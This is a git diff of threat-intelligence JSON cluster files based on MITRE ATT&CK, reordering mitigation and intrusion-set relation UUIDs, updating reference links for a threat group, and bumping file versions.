{ + "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "77e30eee-fd48-40b4-99ec-73e97c158b58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ @@ -5105,55 +5716,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "77e30eee-fd48-40b4-99ec-73e97c158b58", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "tags": [ 
@@ -5162,14 +5724,7 @@ "type": "mitigates" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5181,104 +5736,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" - }, - { - "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8e27551a-5080-4148-a584-c64348212e4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": 
"a8c31121-852b-46bd-9ba4-674ae5afe7ad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" } ], "uuid": "1553b156-6767-47f7-9eb4-2a692505666d", @@ -5301,7 +5758,7 @@ "type": "mitigates" }, { - "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "dest-uuid": "6f86d346-f092-4abc-80df-8558a90c426a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5314,6 +5771,27 @@ ], "type": "mitigates" }, + { + "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "0c71033e-401e-4b97-9309-7a7c95e43a5d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ @@ -5328,13 +5806,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", "tags": [ 
@@ -5342,20 +5813,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "0c71033e-401e-4b97-9309-7a7c95e43a5d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6f86d346-f092-4abc-80df-8558a90c426a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "537ea573-8a1c-468c-956b-d16d2ed9d067", "tags": [ @@ -5384,14 +5841,14 @@ "type": "mitigates" }, { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5405,7 +5862,7 @@ "type": "mitigates" }, { - "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5469,7 +5926,7 @@ "value": "Rootkit Mitigation - T1014" }, { - "description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer which have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", + "description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", "meta": { "external_id": "T1170", "refs": [ 
@@ -5951,5 +6408,5 @@ "value": "Attestation - M1002" } ], - "version": 10 + "version": 12 } diff --git a/clusters/mitre-enterprise-attack-course-of-action.json b/clusters/mitre-enterprise-attack-course-of-action.json index 69a4f2f..2fadd8f 100644 --- a/clusters/mitre-enterprise-attack-course-of-action.json +++ b/clusters/mitre-enterprise-attack-course-of-action.json @@ -973,6 +973,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44", @@ -3665,5 +3672,5 @@ "value": "Security Software Discovery Mitigation - T1063" } ], - "version": 6 + "version": 7 } diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json index db80e2e..c68b99f 100644 --- a/clusters/mitre-intrusion-set.json +++ b/clusters/mitre-intrusion-set.json @@ -16,11 +16,11 @@ "refs": [ "https://attack.mitre.org/groups/G0027", "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", - "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/", "https://www.secureworks.com/research/bronze-union", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", - "https://securelist.com/luckymouse-hits-national-data-center/86083/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" ], "synonyms": [ "Threat Group-3390", 
@@ -62,21 +62,7 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -90,49 +76,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "a60657fa-e2e7-4f8f-8128-a882534ae8c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -146,7 +97,77 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -167,28 +188,49 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a60657fa-e2e7-4f8f-8128-a882534ae8c5", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -202,21 +244,63 @@ "type": "uses" }, { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -230,7 +314,21 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -251,56 +349,14 @@ "type": "uses" }, { - "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -314,77 +370,21 @@ "type": "uses" }, { - "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -423,7 +423,7 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -444,7 +444,7 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -478,28 +478,7 @@ }, "related": [ { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -513,98 +492,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
+ "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -618,63 +506,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
+ "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -688,7 +534,28 @@
 "type": "uses"
 },
 {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -702,63 +569,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
 "tags": [
